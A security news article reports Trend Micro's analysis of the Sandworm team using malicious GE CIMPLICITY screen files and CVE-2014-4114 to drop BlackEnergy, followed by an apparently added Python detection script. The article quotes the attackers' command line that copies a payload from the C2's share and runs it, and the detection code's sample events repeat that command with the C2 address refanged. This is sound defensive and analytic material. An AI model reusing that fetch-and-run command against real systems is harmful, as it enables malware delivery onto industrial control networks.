Sandworm Team Targeted SCADA Systems: Trend Micro

Researchers at Trend Micro say the Sandworm team may have their eyes set on compromising SCADA-based systems.


SCADA (supervisory control and data acquisition) systems are used to monitor and control industrial processes. Last week, researchers at iSight Partners identified the Sandworm team as the actor behind an attack campaign exploiting CVE-2014-4114, a zero-day vulnerability in Windows OLE.

“After beginning an investigation into the affiliated malware samples and domains, we quickly came to the realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite,” Trend Micro researchers Kyle Wilhoit and Jim Gogolinski explained in a blog post. “We have observed this team utilizing .cim and .bcl files as attack vectors, both of which are file types used by the CIMPLICITY software. As further proof of the malware targeting CIMPLICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.”

According to Trend Micro, the attackers were observed sending emails carrying a malicious attachment that is opened by the CIMPLICITY application and attempts to exploit CVE-2014-4114 in Microsoft Windows. If the exploit succeeds on the system running CIMPLICITY, it attempts to download the BlackEnergy malware onto that system. The spear-phishing emails are spoofed to appear to come from Oleh Tiahnybok, a Ukrainian politician who has been critical of Russia.

One of the command and control servers that garnered Trend Micro’s attention was 94[.]185[.]85[.]122.

“We pivoted off this C2, and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e),” the researchers explained. “This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.”

In config.bak there are two defined events, OnOpenExecCommand and ScreenOpenDispatch. According to Trend Micro, the handler of OnOpenExecCommand is the following command line (the C2 address is defanged; the path separators are Windows backslashes):

cmd.exe /c "copy \\94[.]185[.]85[.]122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"

“It’s important to note the variable %CIMPATH% is used for the drop location of default.txt,” the researchers noted. “This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.”
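The two handlers described above give a defender something concrete to look for: an HMI screen viewer spawning cmd.exe to copy a file from a remote UNC share into %CIMPATH% and immediately start it, and the same viewer spawning cscript.exe to run a freshly downloaded script. The following is an added example, written for this page and not code from Trend Micro, SecurityWeek or GE. It scores Sysmon-style process-creation events against those behaviours plus the C2 address quoted in the article. The sample events are constructed, the field names (parent, image, cmdline) are assumed, and the parent process names CimView.exe and CimEdit.exe are assumed to be the executables CIMPLICITY uses to open .cim screens.

```python
import ntpath
import re

# Executables assumed to open CimView/CimEdit screens; adjust to your site.
HMI_PARENTS = {"cimview.exe", "cimedit.exe"}
# Interpreters an HMI screen should not be spawning on an operator station.
SCRIPT_HOSTS = {"cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe"}
# Network indicator quoted in the article (defanged there as 94[.]185[.]85[.]122).
KNOWN_C2 = {"94.185.85.122"}

# "copy \\host\share\..." : a copy whose source is a UNC path.
UNC_COPY = re.compile(r'\bcopy\s+"?\\\\[^\s"\\]+\\', re.IGNORECASE)
CIMPATH_DROP = re.compile(r"%CIMPATH%", re.IGNORECASE)
START_AFTER_COPY = re.compile(r"&&\s*start\b", re.IGNORECASE)


def refang(text):
    """Turn a defanged indicator such as 94[.]185[.]85[.]122 back into an IP."""
    return text.replace("[.]", ".")


def basename(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def classify(event):
    """Return (severity, reasons) for one process-creation event.
    severity: 0 = nothing of note, 1 = suspicious, 2 = high confidence."""
    parent = basename(event["parent"])
    image = basename(event["image"])
    cmd = refang(event["cmdline"])
    severity, reasons = 0, []

    # Behaviour 1: HMI viewer spawning a command or script interpreter.
    if parent in HMI_PARENTS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
        severity = max(severity, 1)

    # Behaviour 2: copy from a UNC share into %CIMPATH%; executing the copy
    # straight away ("&& start") is what raises it to high confidence.
    if UNC_COPY.search(cmd) and CIMPATH_DROP.search(cmd):
        reasons.append("copy from UNC share into %CIMPATH%")
        severity = max(severity, 1)
        if START_AFTER_COPY.search(cmd):
            reasons.append("dropped file executed via 'start'")
            severity = 2

    # Atomic indicator: the C2 address from the report on the command line.
    for ip in KNOWN_C2:
        if re.search(r"\b" + re.escape(ip) + r"\b", cmd):
            reasons.append(f"known C2 address {ip} in command line")
            severity = 2

    return severity, reasons


def scan(events):
    """Return (index, severity, reasons) for every event with severity > 0."""
    hits = []
    for i, ev in enumerate(events):
        sev, why = classify(ev)
        if sev:
            hits.append((i, sev, why))
    return hits


# Constructed sample telemetry (not real logs). Event 0 is the OnOpenExecCommand
# line quoted in the article, event 1 models the ScreenOpenDispatch download
# being run with cscript.exe, event 2 is an ordinary local copy, and event 3 is
# an administrator legitimately deploying a screen from a file server.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Proficy\Proficy CIMPLICITY\exe\CimView.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "copy \\94.185.85.122\public\default.txt "%CIMPATH%\CimCMSafegs.exe" && start "WOW64" "%CIMPATH%\CimCMSafegs.exe"'},
    {"parent": r"C:\Program Files\Proficy\Proficy CIMPLICITY\exe\CimView.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe //E:vbscript C:\Users\op\AppData\Local\Temp\newsfeed.xml"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c copy D:\backup\config.bak C:\Temp\config.bak"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c copy \\fileserver\screens\overview.cim "%CIMPATH%\screens\overview.cim"'},
]

if __name__ == "__main__":
    for idx, sev, why in scan(SAMPLE_EVENTS):
        print(f"event {idx}: severity {sev}: {'; '.join(why)}")
```

Event 3 deliberately scores as suspicious rather than high: copying screens into %CIMPATH% from a share is something an engineer may do, so the rule only escalates when the copied file is started in the same command line or the C2 address appears. Tune HMI_PARENTS and SCRIPT_HOSTS to what the operator stations actually run before deploying this against live telemetry.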

The researchers noted that although CIMPLICITY is being used as an attack vector, there is no indication the attackers are manipulating any actual SCADA systems or data. However, because human-machine interfaces (HMIs) sit in both the corporate and control networks, this attack could be used to target either network segment, or to cross from the corporate network into the control network, they wrote.

Microsoft patched CVE-2014-4114 in October 2014 with security bulletin MS14-060.
